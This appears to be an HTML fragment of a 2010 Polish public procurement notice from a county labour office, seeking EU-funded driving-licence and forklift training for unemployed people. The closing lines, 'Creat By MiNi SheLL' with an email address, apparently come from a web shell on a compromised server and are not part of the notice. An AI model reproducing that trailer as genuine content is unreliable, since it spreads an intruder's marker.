<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- aktualny wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia zgodnie z art. 39g ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm.) dla pierwszej części zamówienia;
- zaświadczenie o wpisie do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców zgodnie z art. 103 ustawy Prawo o ruchu drogowym z dnia 20 czerwca 1997r. (tekst jednolity Dz. U. z 2005r. Nr 108, poz. 908 z późn. zm.),</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Program szkolenia.
- Zestawienie kosztów szkolenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie wykonawcy - 30</li>
<li>3 - Zaangażowanie wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość zmiany postanowień umowy, której wzór wskazany jest w pkt XIX SIWZ. Zmiany mogą dotyczyć:
- zakresu usług objętych umową, w przypadku zmian przepisów prawa w tym zakresie,
- kadry wykonującej przedmiot zamówienia z przyczyn losowych (za zgodą Zamawiającego),
- terminu przeprowadzenia szkolenia, z przyczyn losowych,
- zmiana ilości osób objętych szkoleniem, z przyczyn losowych,
- zmiana kosztów szkolenia jeżeli te zmiany są korzystne dla Zamawiającego,
- zmiana kosztu osobogodziny szkolenia jeżeli ta zmiana jest korzystna dla Zamawiającego,
- zmiana w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy z przyczyn losowych,
- w zakresie: komparycji, literówek, systematyki umowy, podstawy prawne aktów prawnych przywołanych w umowie

Warunkiem dokonania zmiany jest zawiadomienie o zaistnieniu wwym. Okoliczności w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupmakow.eur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Makowie Mazowieckim
ul. Przasnyska 77
06-200 Maków Mazowiecki
pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2010 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Makowie Mazowieckim
ul. Przasnyska 77
06-200 Maków Mazowiecki
Sekretariat, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa jest współfinansowana ze środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Priorytet VI Rynek pracy otwarty dla wszystkich Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych tytuł projektu: Rynek pracy bez barier.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkolenia dla 60 osób bezrobotnych w zakresie Prawo jazdy kat. C współfinasowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. nr 217, poz. 1834 ze zm.).
Ramowy program kursu:
- przepisy ruchu drogowego, 
- technika kierowania pojazdem, 
- czynności kontrolno-obsługowe,
- zasady przewozu osób i ładunków, 
- przedlekarska pomoc,
- praktyczna nauka jazdy.
Ogółem: 65 godzin, w tym: 
- Warsztaty aktywnego poszukiwania pracy - 15 godzin,
Warsztaty aktywnego poszukiwania pracy mają być przeprowadzone przez trenera z wykształceniem wyższym w kierunku: psychologia, socjologia, pedagogika lub podobnym z udokumentowanym doświadczeniem w prowadzeniu zajęć ww typu. Mile widziany doradca zawodowy lub Lider Klubu Pracy. Zajęcia obejmą następujące moduły: aktywne poszukiwanie pracy, trening interpersonalny, autoprezentacja, asertywność, komunikacja interpersonalna.
- część teoretyczna - 20 godzin, 
- część praktyczna - 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Zaangażowanie wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia dla 30 osób bezrobotnych w zakresie Prawo jazdy kat. E (do kategorii C) współfinasowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r. nr 217, poz. 1834 ze zm.).
Program szkolenia musi obejmować następujące zagadnienia:
- zasady ruchu drogowego,
- porządek i bezpieczeństwo ruchu na drodze, czas pracy kierowcy,
- technika kierowania pojazdem i zasady bhp przy transporcie ładunków,
- pierwsza pomoc i zasady postępowania razie uczestnictwa w wypadku drogowym,
- zajęcia praktyczne,
- egzamin. 
Liczba godzin szkolenia ogółem: 60 godzin, w tym  
- Warsztaty aktywnego poszukiwania pracy - 15 godzin,
Warsztaty aktywnego poszukiwania pracy mają być przeprowadzone przez trenera z wykształceniem wyższym w kierunku: psychologia, socjologia, pedagogika lub podobnym z udokumentowanym doświadczeniem w prowadzeniu zajęć ww typu. Mile widziany doradca zawodowy lub Lider Klubu Pracy. Zajęcia obejmą następujące moduły: aktywne poszukiwanie pracy, trening interpersonalny, autoprezentacja, asertywność, komunikacja interpersonalna.
- część teoretyczna -  20 godzin, 
- część praktyczna -   25 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Zaangażowanie wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie szkolenia dla 30 osób bezrobotnych w zakresie Wózki jezdniowe z napędem silnikowym wraz z uprawnieniami w zakresie bezpiecznej obsługi i wymiany butli gazowych wyposażonych w te urządzenia współfinasowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r. nr 217, poz. 1834 ze zm.).
Program szkolenia musi obejmować następujące zagadnienia:
- typy stosowanych wózków jezdniowych,
- budowa wózka,
- czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkiem,
- czynności operatora w czasie pracy wózkiem, 
- wiadomości z zakresu ładunkoznawstwa, 
- wiadomości z zakresu bezpieczeństwa i higieny pracy, przepisów ppoż., 
- praktyczna nauka jazdy i manewrowania osprzętem wózków,
- wiadomości o dozorze technicznym, 
- bezpieczna obsługa i wymiana butli gazowej,
- oraz dodatkowo zagadnienia z zakresu ochrony środowiska.
Liczba godzin szkolenia ogółem: 82 godziny, w tym:
- Warsztaty aktywnego poszukiwania pracy - 15 godzin,
Warsztaty aktywnego poszukiwania pracy mają być przeprowadzone przez trenera z wykształceniem wyższym w kierunku: psychologia, socjologia, pedagogika lub podobnym z udokumentowanym doświadczeniem w prowadzeniu zajęć ww typu. Mile widziany doradca zawodowy lub Lider Klubu Pracy. Zajęcia obejmą następujące moduły: aktywne poszukiwanie pracy, trening interpersonalny, autoprezentacja, asertywność, komunikacja interpersonalna.
- część teoretyczna -  40 godzin, 
- część praktyczna -   27 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 30</li>
<li>3. Zaangażowanie wykonawcy w pozyskiwanie miejsc pracy dla przeszkolonych osób - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com